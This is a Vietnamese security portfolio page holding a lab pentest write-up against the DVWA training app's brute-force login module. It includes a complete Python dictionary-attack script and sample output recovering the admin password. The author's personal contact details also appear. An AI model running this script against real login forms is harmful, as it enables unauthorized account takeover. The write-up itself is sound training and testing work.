Hieu dinh- Information Assurance Portfolio.
Loading...
{"desktop":{"unique_in":[],"is_horizontal_lv1":1,"is_horizontal_lv2":0,"is_horizontal_lv3":0,"is_horizontal_lv4":0,"column_lv1":1,"column_lv2":1,"column_lv3":1,"column_lv4":1,"position_lv2":"bottom","position_lv3":"","position_lv4":"","turn_on_arrow_1":0,"open_hover":0,"icon_open_horizontal":"","icon_close_horizontal":"","icon_open":"","icon_close":"","device_off_open_hover":"1024px","device_allow_event_toggle":0,"open_to_level":0,"style_lv2_box":{"width":""},"style_lv3_box":{"width":""},"style_lv4_box":{"width":""},"style_custom":[]},"1024px":{"style_lv2_box":[],"style_lv3_box":[],"style_lv4_box":[],"style_custom":[]}}
CV của tôi
Loading...
{"desktop":{"unique_in":[],"is_horizontal_lv1":1,"is_horizontal_lv2":0,"is_horizontal_lv3":0,"is_horizontal_lv4":0,"column_lv1":1,"column_lv2":1,"column_lv3":1,"column_lv4":1,"position_lv2":"bottom","position_lv3":"","position_lv4":"","turn_on_arrow_1":0,"open_hover":0,"icon_open_horizontal":"","icon_close_horizontal":"","icon_open":"","icon_close":"","device_off_open_hover":"1024px","device_allow_event_toggle":0,"open_to_level":0,"style_lv2_box":{"width":""},"style_lv3_box":{"width":""},"style_lv4_box":{"width":""},"style_custom":[]},"640px":{"style_lv2_box":[],"style_lv3_box":[],"style_lv4_box":[],"style_custom":[]},"375px":{"style_lv2_box":[],"style_lv3_box":[],"style_lv4_box":[],"style_custom":[]}}
John Thompson
Loading...
{"desktop":{"unique_in":[],"is_horizontal_lv1":1,"is_horizontal_lv2":0,"is_horizontal_lv3":0,"is_horizontal_lv4":0,"column_lv1":1,"column_lv2":1,"column_lv3":1,"column_lv4":1,"position_lv2":"bottom","position_lv3":"","position_lv4":"","turn_on_arrow_1":0,"open_hover":0,"icon_open_horizontal":"","icon_close_horizontal":"","icon_open":"","icon_close":"","device_off_open_hover":"1024px","device_allow_event_toggle":0,"open_to_level":0,"style_lv2_box":{"width":""},"style_lv3_box":{"width":""},"style_lv4_box":{"width":""},"style_custom":[]},"1024px":{"style_lv2_box":[],"style_lv3_box":[],"style_lv4_box":[],"style_custom":[]}}
Liên hệ ngay
Loading...
{"desktop":{"unique_in":[],"is_horizontal_lv1":1,"is_horizontal_lv2":0,"is_horizontal_lv3":0,"is_horizontal_lv4":0,"column_lv1":1,"column_lv2":1,"column_lv3":1,"column_lv4":1,"position_lv2":"bottom","position_lv3":"","position_lv4":"","turn_on_arrow_1":0,"open_hover":0,"icon_open_horizontal":"","icon_close_horizontal":"","icon_open":"","icon_close":"","device_off_open_hover":"1024px","device_allow_event_toggle":0,"open_to_level":0,"style_lv2_box":{"width":""},"style_lv3_box":{"width":""},"style_lv4_box":{"width":""},"style_custom":[]},"640px":{"style_lv2_box":[],"style_lv3_box":[],"style_lv4_box":[],"style_custom":[]},"375px":{"style_lv2_box":[],"style_lv3_box":[],"style_lv4_box":[],"style_custom":[]}}
HiếuIA
Thông tin
Đinh Trung Hiếu
15 Hoàng Thúc Trâm
hieudzbodoi04@gmail.com
0787652705
Sản phẩm của
Cung cấp bởi P.A Việt Nam
[]
{"id":727456,"name":"[Pentest Report] DVWA :Python Tool: Web Login Brute-Force","desc":"<p>Script Python tự động hóa sử dụng thư viện Requests để thực hiện tấn công Dictionary Attack, dùng để kiểm thử độ mạnh mật khẩu của form đăng nhập website.<\/p>\n","content":"<p style=\"margin-right:0cm; margin-left:0cm\"><span style=\"font-size:12pt\"><span style=\"font-family:"Times New Roman",serif\"><b><span style=\"color:black\">Dự án:<\/span><\/b><span style=\"color:black\"> Kiểm thử xâm nhập hệ thống DVWA <b>Hạng mục:<\/b> Module Brute Force (Authentication) <\/span><\/span><\/span><\/p>\n\n<p style=\"margin-right:0cm; margin-left:0cm\"><span style=\"font-size:12pt\"><span style=\"font-family:"Times New Roman",serif\"><b><span style=\"color:black\">Mức độ nghiêm trọng:<\/span><\/b><span style=\"color:black\"> ???? <b>HIGH (Cao)<\/b><\/span><\/span><\/span><\/p>\n\n<div align=\"center\" style=\"text-align:center; margin:0cm 0cm 8pt\">\n<hr align=\"center\" size=\"3\" width=\"100%\" \/><\/div>\n\n<h2 style=\"margin:2pt 0cm 0.0001pt\"><span style=\"font-size:13pt\"><span style=\"line-height:107%\"><span style=\"font-family:"Calibri Light",sans-serif\"><span style=\"color:#2e74b5\"><span style=\"font-weight:normal\"><span style=\"font-family:"Times New Roman",serif\"><span style=\"color:black\">1. Tóm tắt Quản trị (Executive Summary)<\/span><\/span><\/span><\/span><\/span><\/span><\/span><\/h2>\n\n<p style=\"margin-right:0cm; margin-left:0cm\"><span style=\"font-size:12pt\"><span style=\"font-family:"Times New Roman",serif\"><span style=\"color:black\">Trong quá trình đánh giá bảo mật ứng dụng DVWA, chúng tôi đã phát hiện một lỗ hổng nghiêm trọng liên quan đến cơ chế xác thực người dùng. Cụ thể, trang đăng nhập không có cơ chế ngăn chặn hiệu quả các cuộc tấn công đoán mật khẩu tự động (<b>Brute Force Attack<\/b>).<\/span><\/span><\/span><\/p>\n\n<p style=\"margin-right:0cm; margin-left:0cm\"><span style=\"font-size:12pt\"><span style=\"font-family:"Times New Roman",serif\"><span style=\"color:black\">Mặc dù hệ thống đã triển khai một biện pháp phòng thủ thụ động là làm chậm phản hồi (Time Delay - 2 giây), nhưng kẻ tấn công vẫn có thể sử dụng các công cụ tự động hóa để dò tìm mật khẩu thành công trong thời gian ngắn. Việc khai thác thành công lỗ hổng này cho phép kẻ tấn công chiếm quyền điều khiển tài khoản quản trị viên (Admin), dẫn đến nguy cơ mất kiểm soát hoàn toàn hệ thống.#<\/span><\/span><\/span><\/p>\n\n<p style=\"margin-right:0cm; margin-left:0cm\"> <\/p>\n\n<h2 style=\"margin:2pt 0cm 0.0001pt\"><span style=\"font-size:13pt\"><span style=\"line-height:107%\"><span style=\"font-family:"Calibri Light",sans-serif\"><span style=\"color:#2e74b5\"><span style=\"font-weight:normal\"><span style=\"font-family:"Times New Roman",serif\"><span style=\"color:black\">2. Chi tiết Kỹ thuật (Technical Details)<\/span><\/span><\/span><\/span><\/span><\/span><\/span><\/h2>\n\n<ul>\n\t<li style=\"margin-right:0cm\"><span style=\"font-size:12pt\"><span style=\"tab-stops:list 36.0pt\"><span style=\"font-family:"Times New Roman",serif\"><b><span style=\"color:black\">Vị trí lỗ hổng (Vulnerable Endpoint):<\/span><\/b><\/span><\/span><\/span>\n\n\t<ul style=\"list-style-type:circle\">\n\t\t<li style=\"margin-right:0cm\"><span style=\"font-size:12pt\"><span style=\"tab-stops:list 72.0pt\"><span style=\"font-family:"Times New Roman",serif\"><span style=\"color:black\">URL: <\/span><code style=\"font-family:"Courier New"\"><span style=\"font-size:10.0pt\"><span style=\"color:black\">http:\/\/[192.168.137.98]\/dvwa\/vulnerabilities\/brute\/<\/span><\/span><\/code><\/span><\/span><\/span><\/li>\n\t\t<li style=\"margin-right:0cm\"><span style=\"font-size:12pt\"><span style=\"tab-stops:list 72.0pt\"><span style=\"font-family:"Times New Roman",serif\"><span style=\"color:black\">Phương thức: <\/span><code style=\"font-family:"Courier New"\"><span style=\"font-size:10.0pt\"><span style=\"color:black\">GET<\/span><\/span><\/code><\/span><\/span><\/span><\/li>\n\t<\/ul>\n\t<\/li>\n\t<li style=\"margin-right:0cm\"><span style=\"font-size:12pt\"><span style=\"tab-stops:list 36.0pt\"><span style=\"font-family:"Times New Roman",serif\"><b><span style=\"color:black\">Loại lỗ hổng:<\/span><\/b><span style=\"color:black\"> Weak Lockout Mechanism (Cơ chế khóa tài khoản yếu) \/ Improper Restriction of Excessive Authentication Attempts.<\/span><\/span><\/span><\/span><\/li>\n\t<li style=\"margin-right:0cm\"><span style=\"font-size:12pt\"><span style=\"tab-stops:list 36.0pt\"><span style=\"font-family:"Times New Roman",serif\"><b><span style=\"color:black\">Môi trường kiểm thử:<\/span><\/b><\/span><\/span><\/span>\n\t<ul style=\"list-style-type:circle\">\n\t\t<li style=\"margin-right:0cm\"><span style=\"font-size:12pt\"><span style=\"tab-stops:list 72.0pt\"><span style=\"font-family:"Times New Roman",serif\"><span style=\"color:black\">DVWA Security Level: <b>Medium<\/b>.<\/span><\/span><\/span><\/span><\/li>\n\t\t<li style=\"margin:0cm 0cm 8pt\"><span style=\"font-size:11pt\"><span style=\"line-height:normal\"><span style=\"tab-stops:list 72.0pt\"><span style=\"font-family:Calibri,sans-serif\"><span style=\"font-size:12.0pt\"><span style=\"font-family:"Times New Roman",serif\">Công cụ khai thác: <b>Python 3 (Custom Script)<\/b> sử dụng thư viện <\/span><\/span><span style=\"font-size:10.0pt\"><span style=\"font-family:"Courier New"\">requests<\/span><\/span><span style=\"font-size:12.0pt\"><span style=\"font-family:"Times New Roman",serif\">.<\/span><\/span><\/span><\/span><\/span><\/span><\/li>\n\t<\/ul>\n\t<\/li>\n\t<li style=\"margin:0cm 0cm 8pt\"><span style=\"font-size:11pt\"><span style=\"line-height:normal\"><span style=\"tab-stops:list 36.0pt\"><span style=\"font-family:Calibri,sans-serif\"><b><span style=\"font-size:12.0pt\"><span style=\"font-family:"Times New Roman",serif\">Lý do sử dụng Python:<\/span><\/span><\/b><span style=\"font-size:12.0pt\"><span style=\"font-family:"Times New Roman",serif\"> Các công cụ tự động như Hydra gặp khó khăn trong việc xử lý độ trễ (timeout) hoặc tùy biến logic kiểm tra lỗi. Script Python cho phép kiểm soát chính xác luồng dữ liệu và vượt qua cơ chế làm chậm.<\/span><\/span><\/span><\/span><\/span><\/span>\n\t<ul style=\"list-style-type:circle\">\n\t\t<li style=\"margin-right:0cm\"> <\/li>\n\t<\/ul>\n\t<\/li>\n<\/ul>\n\n<p style=\"margin-right:0cm; margin-left:0cm\"><b><span style=\"font-size:11.0pt\"><span style=\"line-height:107%\"><span style=\"font-family:"Calibri",sans-serif\"><span style=\"color:black\">Mô tả cơ chế phòng thủ hiện tại:<\/span><\/span><\/span><\/span><\/b><span style=\"font-size:11.0pt\"><span style=\"line-height:107%\"><span style=\"font-family:"Calibri",sans-serif\"><span style=\"color:black\"> Ứng dụng sử dụng hàm <\/span><\/span><\/span><\/span><code style=\"font-family:"Courier New"\"><span style=\"font-size:10.0pt\"><span style=\"line-height:107%\"><span style=\"font-family:"Times New Roman",serif\"><span style=\"color:black\">sleep(2)<\/span><\/span><\/span><\/span><\/code><span style=\"font-size:11.0pt\"><span style=\"line-height:107%\"><span style=\"font-family:"Calibri",sans-serif\"><span style=\"color:black\"> để làm chậm quá trình phản hồi khi người dùng nhập sai mật khẩu, nhằm ngăn chặn tấn công nhanh. Tuy nhiên, ứng dụng <b>không khóa tài khoản<\/b> và <b>không sử dụng CAPTCHA<\/b>.<\/span><\/span><\/span><\/span><\/p>\n\n<p data-path-to-node=\"9,0,2\"><b>3.Nguyên lý hoạt động:<\/b><\/p>\n\n<ul data-path-to-node=\"9,0,3\">\n\t<li>\n\t<p data-path-to-node=\"9,0,3,0,0\">Bước 1: Xác định URL mục tiêu và cookie phiên làm việc (Session ID).<\/p>\n\t<\/li>\n\t<li>\n\t<p data-path-to-node=\"9,0,3,1,0\">Bước 2: Nạp file từ điển (wordlist) rockyou.txt chứa các mật khẩu phổ biến.<\/p>\n\t<\/li>\n<\/ul>\n\n<p><span style=\"font-family:Courier New,Courier,monospace;\">import requests<\/span><\/p>\n\n<p><span style=\"font-family:Courier New,Courier,monospace;\"># Cấu hình mục tiêu (Target)<br \/>\nurl = "http:\/\/192.168.1.10\/dvwa\/vulnerabilities\/brute\/"<br \/>\ncookies = {"security": "medium", "PHPSESSID": "your_session_id_here"}<br \/>\nwordlist_file = "rockyou.txt"<br \/>\nusername = "admin"<\/span><\/p>\n\n<p><span style=\"font-family:Courier New,Courier,monospace;\">print(f"[*] Đang tấn công User: {username}...")<\/span><\/p>\n\n<p><span style=\"font-family:Courier New,Courier,monospace;\">try:<br \/>\n # Đọc file từ điển<br \/>\n with open(wordlist_file, "r", encoding="latin-1") as f:<br \/>\n passwords = f.read().splitlines()<\/span><\/p>\n\n<p><span style=\"font-family:Courier New,Courier,monospace;\"> # Bắt đầu vòng lặp tấn công<br \/>\n for password in passwords:<br \/>\n params = {'username': username, 'password': password, 'Login': 'Login'}<br \/>\n <br \/>\n try:<br \/>\n # Gửi Request<br \/>\n r = requests.get(url, params=params, cookies=cookies)<br \/>\n <br \/>\n # Kiểm tra kết quả<br \/>\n if "Username and\/or password incorrect" not in r.text:<br \/>\n print(f"\\n[+] TÌM THẤY MẬT KHẨU: {password}")<br \/>\n break<br \/>\n else:<br \/>\n print(f"[-] Sai: {password}")<br \/>\n <br \/>\n except Exception as e:<br \/>\n print(f"[!] Lỗi kết nối: {e}")<\/span><\/p>\n\n<p><span style=\"font-family:Courier New,Courier,monospace;\">except FileNotFoundError:<br \/>\n print(f"Lỗi: Không tìm thấy file {wordlist_file}!")<\/span><\/p>\n\n<ul data-path-to-node=\"9,0,3\">\n\t<li>\n\t<p data-path-to-node=\"9,0,3,2,0\">Bước 3: Gửi request đăng nhập với từng mật khẩu.<\/p>\n\t<\/li>\n<\/ul>\n\n<p><span style=\"font-family:Courier New,Courier,monospace;\">(root????kali)-[~]<br \/>\n# python3 brute_medium.py<br \/>\n[*] Dang tan cong User: admin...<br \/>\n[-] Sai: 123456<br \/>\n[-] Sai: 12345<br \/>\n[-] Sai: 123456789<\/span><\/p>\n\n<p><span style=\"font-family:Courier New,Courier,monospace;\">[+] TIM THAY ROI: password<\/span><\/p>\n\n<p>Đã tìm thấy.<\/p>\n","image_url":"https:\/\/www.hieudt.id.vn\/datafiles\/78362\/upload\/files\/hacker-hoodie-is-sitting-chair-looking-city-night-generative-ai_11zon-1024x585.jpg?t=1764915318","image_thumb_url":"https:\/\/www.hieudt.id.vn\/datafiles\/78362\/upload\/thumb_files\/hacker-hoodie-is-sitting-chair-looking-city-night-generative-ai_11zon-1024x585.jpg?t=1764919242","tags":[],"count_view":4,"seo_name":"python-brute-force","date_update":1764913970,"date_created_format":1764915462,"meta_title":"","meta_desc":"","meta_keyword":"","qr_code":"https:\/\/www.hieudt.id.vn\/python-brute-force","title_page":"Tin tức","relate_object_id":727456,"company_logo":"https:\/\/www.hieudt.id.vn\/datafiles\/78362\/upload\/files\/ta%CC%89i%20xu%C3%B4%CC%81ng.png","company_name":"HiếuIA","company_email":"hieudzbodoi04@gmail.com","company_phone":"0787652705","company_address":"15 Hoàng Thúc Trâm","company_fax":"","date_now":1776928823,"company_tags":["IA","Security","Cyber security"],"search_keyword":null,"facebook_comment":"https:\/\/www.hieudt.id.vn\/python-brute-force","breadscrumb":[{"url":"https:\/\/www.hieudt.id.vn","name":"About me","icon":"","active":false},{"url":"https:\/\/www.hieudt.id.vn\/tin-tuc","name":"Tin tức","icon":"","active":false},{"url":"https:\/\/www.hieudt.id.vn\/hoat-dong-tieu-bieu","name":"Hoạt động tiêu biểu","icon":"","active":true}],"list_products_tmp":[],"list_section":[{"id":661873,"name":"Header","seo_name":"#w30s-section-661873","url":"#w30s-section-661873"},{"id":661874,"name":"Header","seo_name":"#w30s-section-661874","url":"#w30s-section-661874"},{"id":661875,"name":"Footer","seo_name":"#w30s-section-661875","url":"#w30s-section-661875"}],"type_page":7,"id_page":460940,"widget_15341321":{"content_data":{"content":"Hieu dinh- Information Assurance Portfolio."}},"widget_15341323":{"content_data":{"content":"CV của tôi"}},"widget_15341327":{"content_data":{"content":"John Thompson\n"}},"widget_15341329":{"content_data":{"content":"Liên hệ ngay"}},"widget_15341335":{"content_data":{"content":"Thông tin"}},"widget_15341336":{"content_data":{"content":"Đinh Trung Hiếu"}},"widget_15341317":{"content_data":{"content":"Sản phẩm của"}},"widget_15341319":{"content_data":{"content":"Cung cấp bởi P.A Việt Nam"}}}
